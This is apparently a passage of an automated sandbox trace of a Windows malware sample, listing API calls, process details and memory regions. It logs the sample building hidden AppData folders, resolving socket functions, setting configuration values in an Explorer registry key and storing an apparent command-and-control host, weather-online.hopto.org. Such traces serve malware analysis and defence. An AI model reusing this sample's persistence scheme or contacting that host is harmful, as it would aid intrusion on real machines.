dwHighDateTime=0x1d3dfba)) [0031.545] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20f2b0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.545] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20f198, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.545] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetLastError () returned 0x0 [0031.546] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.547] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0031.547] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.547] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.547] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.547] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.547] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0031.547] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0031.547] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0031.547] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0031.547] GetLastError () returned 0xb7 [0031.547] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.548] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0031.548] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0031.548] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0031.548] wsprintfA (in: param_1=0x20f018, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.548] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0031.548] wsprintfA (in: param_1=0x20ef14, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.548] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.548] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0031.548] CloseHandle (hObject=0x74) returned 1 [0031.548] GetLastError () returned 0x0 [0031.548] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0031.548] GetLastError () returned 0x0 [0031.548] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0031.549] GetSystemDirectoryA (in: lpBuffer=0x20f018, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.549] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.549] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0031.549] CloseHandle (hObject=0x74) returned 1 [0031.549] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.550] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.550] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0031.552] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0031.552] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0031.552] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0031.553] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0031.553] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0031.553] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0031.553] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0031.553] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0031.553] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0031.553] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0031.553] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0031.554] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0031.554] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0031.554] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0031.554] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0031.554] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0031.554] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0031.554] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0031.554] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0031.554] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0031.554] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0031.555] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0031.555] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0031.555] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0031.555] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0031.555] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0031.555] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0031.555] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0031.555] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0031.555] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0031.555] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0031.556] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0031.556] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0031.556] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0031.556] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0031.556] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0031.556] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.556] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0031.556] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0031.556] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0031.556] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0031.556] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0031.557] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0031.557] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0031.557] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0031.557] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0031.557] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0031.557] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0031.557] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0031.557] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0031.557] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0031.557] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0031.558] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0031.558] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0031.580] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0031.580] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0031.580] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0031.580] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0031.580] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0031.580] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0031.580] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.580] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.581] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.581] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0031.588] AddAtomT () returned 0x0 [0031.588] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x20f54c, lpdwDisposition=0x20f550 | out: phkResult=0x20f54c*=0x78, lpdwDisposition=0x20f550*=0x2) returned 0x0 [0031.589] CloseHandle (hObject=0x78) returned 1 [0031.589] SendMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0031.589] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x20f598, lpdwDisposition=0x20f650 | out: phkResult=0x20f598*=0x7c, lpdwDisposition=0x20f650*=0x2) returned 0x0 [0031.589] RegQueryValueExA (in: hKey=0x7c, lpValueName="Timout", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1ed94, lpcbData=0x20f594*=0x4 | out: lpType=0x20f59c*=0x0, lpData=0x72f1ed94*=0x0, lpcbData=0x20f594*=0x4) returned 0x2 [0031.589] RegQueryValueExA (in: hKey=0x7c, lpValueName="IsActive", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1ed98, lpcbData=0x20f594*=0x4 | out: lpType=0x20f59c*=0x0, lpData=0x72f1ed98*=0x0, lpcbData=0x20f594*=0x4) returned 0x2 [0031.589] RegQueryValueExA (in: hKey=0x7c, lpValueName="BSlp", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1ed9c, lpcbData=0x20f594*=0x4 | out: lpType=0x20f59c*=0x0, lpData=0x72f1ed9c*=0x0, lpcbData=0x20f594*=0x4) returned 0x2 [0031.589] RegQueryValueExA (in: hKey=0x7c, lpValueName="SDCnt", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1eda4, lpcbData=0x20f594*=0x4 | out: lpType=0x20f59c*=0x0, lpData=0x72f1eda4*=0x0, lpcbData=0x20f594*=0x4) returned 0x2 [0031.590] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastValue", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1eda8, lpcbData=0x20f594*=0x4 | out: lpType=0x20f59c*=0x0, lpData=0x72f1eda8*=0x0, lpcbData=0x20f594*=0x4) returned 0x2 [0031.590] RegQueryValueExA (in: hKey=0x7c, lpValueName="Id", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1edb8, lpcbData=0x20f594*=0x8 | out: lpType=0x20f59c*=0x3, lpData=0x72f1edb8*, lpcbData=0x20f594*=0x8) returned 0x0 [0031.590] RegQueryValueExA (in: hKey=0x7c, lpValueName="StVal", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1edc0, lpcbData=0x20f594*=0x4 | out: lpType=0x20f59c*=0x4, lpData=0x72f1edc0*=0x0, lpcbData=0x20f594*=0x4) returned 0x0 [0031.590] RegQueryValueExA (in: hKey=0x7c, lpValueName="EmtParam", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1edc4, lpcbData=0x20f594*=0x4 | out: lpType=0x20f59c*=0x0, lpData=0x72f1edc4*=0x0, lpcbData=0x20f594*=0x4) returned 0x2 [0031.590] RegQueryValueExA (in: hKey=0x7c, lpValueName="HtParam", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1edc8, lpcbData=0x20f594*=0x4 | out: lpType=0x20f59c*=0x4, lpData=0x72f1edc8*=0x1c20, lpcbData=0x20f594*=0x4) returned 0x0 [0031.590] RegQueryValueExA (in: hKey=0x7c, lpValueName="CMValue", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1edcc, lpcbData=0x20f594*=0x4 | out: lpType=0x20f59c*=0x4, lpData=0x72f1edcc*=0x0, lpcbData=0x20f594*=0x4) returned 0x0 [0031.590] RegQueryValueExA (in: hKey=0x7c, lpValueName="ILevelCount", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1edd0, lpcbData=0x20f594*=0x4 | out: lpType=0x20f59c*=0x4, lpData=0x72f1edd0*=0x1, lpcbData=0x20f594*=0x4) returned 0x0 [0031.590] RegQueryValueExA (in: hKey=0x7c, lpValueName="IListLen", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1eddc, lpcbData=0x20f594*=0x4 | out: lpType=0x20f59c*=0x0, lpData=0x72f1eddc*=0x0, lpcbData=0x20f594*=0x4) returned 0x2 [0031.590] RegQueryValueExA (in: hKey=0x7c, lpValueName="IList", lpReserved=0x0, lpType=0x20f59c, lpData=0x1290b28, lpcbData=0x20f594*=0x200 | out: lpType=0x20f59c*=0x0, lpData=0x1290b28*=0x0, lpcbData=0x20f594*=0x200) returned 0x2 [0031.590] RegQueryValueExA (in: hKey=0x7c, lpValueName="Installed", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1eef0, lpcbData=0x20f594*=0x4 | out: lpType=0x20f59c*=0x0, lpData=0x72f1eef0*=0x1, lpcbData=0x20f594*=0x4) returned 0x2 [0031.590] RegQueryValueExA (in: hKey=0x7c, lpValueName="IPlace", lpReserved=0x0, lpType=0x20f59c, lpData=0x1290d30, lpcbData=0x20f594*=0x64 | out: lpType=0x20f59c*=0x3, lpData=0x1290d30*, lpcbData=0x20f594*=0x64) returned 0x0 [0031.590] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0031.590] RegQueryValueExA (in: hKey=0x7c, lpValueName="ISFValue", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1edec, lpcbData=0x20f594*=0x104 | out: lpType=0x20f59c*=0x0, lpData=0x72f1edec*=0x0, lpcbData=0x20f594*=0x104) returned 0x2 [0031.590] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastId", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1eef4, lpcbData=0x20f594*=0x8 | out: lpType=0x20f59c*=0x0, lpData=0x72f1eef4*=0x0, lpcbData=0x20f594*=0x8) returned 0x2 [0031.591] RegQueryValueExA (in: hKey=0x7c, lpValueName="NTries", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1eefc, lpcbData=0x20f594*=0x4 | out: lpType=0x20f59c*=0x0, lpData=0x72f1eefc*=0x0, lpcbData=0x20f594*=0x4) returned 0x2 [0031.591] RegQueryValueExA (in: hKey=0x7c, lpValueName="IMValue", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1ef00, lpcbData=0x20f594*=0x4 | out: lpType=0x20f59c*=0x0, lpData=0x72f1ef00*=0x0, lpcbData=0x20f594*=0x4) returned 0x2 [0031.591] RegQueryValueExA (in: hKey=0x7c, lpValueName="LCValue", lpReserved=0x0, lpType=0x20f59c, lpData=0x72f1eda0, lpcbData=0x20f594*=0x4 | out: lpType=0x20f59c*=0x0, lpData=0x72f1eda0*=0x0, lpcbData=0x20f594*=0x4) returned 0x2 [0031.591] RegCloseKey (hKey=0x7c) returned 0x0 [0031.591] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x20f658 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x20f658*=0x2) returned 0x0 [0031.591] RegSetValueExA (in: hKey=0x7c, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x72f1edc8*=0x1c20, cbData=0x4 | out: lpData=0x72f1edc8*=0x1c20) returned 0x0 [0031.591] GetLastError () returned 0x0 [0031.591] RegCloseKey (hKey=0x7c) returned 0x0 [0031.592] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x20f668 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x20f668*=0x2) returned 0x0 [0031.592] RegSetValueExA (in: hKey=0x7c, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x72f1edc0*=0x0, cbData=0x4 | out: lpData=0x72f1edc0*=0x0) returned 0x0 [0031.592] RegCloseKey (hKey=0x7c) returned 0x0 [0031.592] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x20f658 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x20f658*=0x2) returned 0x0 [0031.592] RegSetValueExA (in: hKey=0x7c, lpValueName="CMValue", Reserved=0x0, dwType=0x4, lpData=0x72f1edcc*=0x0, cbData=0x4 | out: lpData=0x72f1edcc*=0x0) returned 0x0 [0031.592] RegCloseKey (hKey=0x7c) returned 0x0 [0031.592] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x20f654 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x20f654*=0x2) returned 0x0 [0031.592] RegSetValueExA (in: hKey=0x7c, lpValueName="ILevelCount", Reserved=0x0, dwType=0x4, lpData=0x72f1edd0*=0x1, cbData=0x4 | out: lpData=0x72f1edd0*=0x1) returned 0x0 [0031.592] RegCloseKey (hKey=0x7c) returned 0x0 [0031.592] GetLastError () returned 0x0 [0031.592] GetLastError () returned 0x0 [0031.592] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0031.592] lstrlenA (lpString="00") returned 2 [0031.592] lstrlenA (lpString="/00/") returned 4 [0031.593] wsprintfA (in: param_1=0x1290da0, param_2="%s" | out: param_1="weather-online.hopto.org") returned 24 [0031.593] wsprintfA (in: param_1=0x1290dc8, param_2="%s" | out: param_1="00") returned 2 [0031.593] wsprintfA (in: param_1=0x12926e0, param_2="%s" | out: param_1="/00/") returned 4 [0031.593] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0031.593] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0031.593] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x20f654 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x20f654*=0x2) returned 0x0 [0031.593] RegSetValueExA (in: hKey=0x7c, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x1290d30*, cbData=0x64 | out: lpData=0x1290d30*) returned 0x0 [0031.593] RegCloseKey (hKey=0x7c) returned 0x0 [0031.596] HeapDestroy (hHeap=0x1290000) returned 1 Process: id = "12" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f7e0" os_pid = "0xae0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"0\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 648 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 649 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 650 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 651 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 652 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 653 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 654 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 655 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 656 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 657 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 658 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 659 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 660 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 661 start_va = 0x5f0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 662 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 663 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 664 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 665 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 666 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 667 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 668 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 669 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = 